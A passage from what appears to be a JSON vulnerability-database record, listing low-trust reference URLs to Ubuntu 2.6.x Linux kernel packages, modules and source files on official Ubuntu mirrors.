        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-306.11.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-virtual_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic-pae_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.32_2.6.32-306.11_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.32-22.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.84_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306-ec2_2.6.32-306.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-386_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.35.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64-smp_2.6.31-22.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22_2.6.32-22.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-server_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
